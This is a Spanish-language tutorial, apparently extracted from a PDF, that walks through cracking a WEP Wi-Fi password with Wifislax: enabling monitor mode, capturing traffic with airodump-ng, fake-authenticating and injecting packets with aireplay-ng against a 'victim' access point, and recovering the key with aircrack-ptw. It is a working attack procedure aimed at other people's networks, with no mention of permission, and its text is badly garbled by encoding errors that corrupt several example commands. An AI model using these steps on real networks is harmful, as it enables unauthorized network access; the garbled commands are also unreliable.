Está en la página 1de 4

Ahora ya con nuestro disco de wifislax lo insertamos en la pc e iniciamos desde el cdrom, despus de unos minutos y de una o dos opciones

que te aparecen, seguir unas cuantas indicaciones te loggeas e inicias el entorno grfico (Es muy fcil por eso no doy detalles). a en el wifislax le das en el icono del escritorio !"hell! y te a#re una $entana parecida al %"-&'" a la cual le llamaremos !(onsola! de ahora en adelante. a en la empe)aremos checando las tar*etas wlan con el siguiente comando+ iwconfig ,e aparecen las tar*etas que tienes instaladas en el sistema, entre ellas la que utili)ars, yo utili)o una alfa networ- de .//mw y me #asar en ella. 0na $e) identificada tu tar*eta se procede a correr el modo monitor con el siguiente comando+ airmon-ng start wlan0 6 Atenci1n+ (on este comando se inicia el modo monitor en el canal 2, si deseas utili)ar otro canal para detectar otras redes puedes sustituir el 2 por cualquier otro n3mero.

&espus de acti$ado el modo monitor empe)aremos a detectar redes en este caso en el canal 2. airodump-ng -w aaaa -c6 wlan0 (Aqu4 mismo sustituyes -c2 por el canal que t3 quieras) (El aaaa es un nom#re de archi$o elegido por ti, se puede llamar hola si t3 quieres)

Escoges alguna red con encriptaci1n 5E6, a#res una nue$a consola y escri#es lo siguiente+ aireplay-ng -1 30 -e XXXX -a MACV -h MACC wlan0 Ahora explico el comando+ XXXX - Aqu !a el "##$% de tu !ictima MACV - Aqu !a la direcci&n MAC de tu ! ctima MACC - Aqu de'es introducir la direcci&n MAC de tu wlan( 7uedar4a ms o menos as4+ aireplay-ng -8 9/ -e :;<:;:,0%=== -a //+//+//+//+// -h //+//+//+/8 wlan/ (on esto tu tar*eta quedar asociada con el punto de acceso $4ctima

Ahora empe)aremos a inyectar paquetes usando el siguiente comando+ aireplay-ng -3 -)600 -' MACV -h MACC wlan0 (En este momento ya de#es sa#er

donde $as a sustituir y con que) 7uedar4a ms o menos as4+ aireplay-ng -9 -x2// -# //+//+//+//+// -h //+//+//+//+/8 wlan/ &espus de esto los paquetes empe)arn a ser en$iados.

&espus de so#repasados los 8//,/// paquetes en$iados se procede a o#tener la cla$e+ A#res una nue$a consola y escri#es lo siguiente+ aircrac*-ptw aaaa-01(cap (Aqu4 se utili)a el nom#re de archi$o que especificamos casi al principio al correr el airodump ms el -/8 o cualquier otro n3mero -/>, -/9 etc...)

Apuntas la cla$e 5E6 y listo.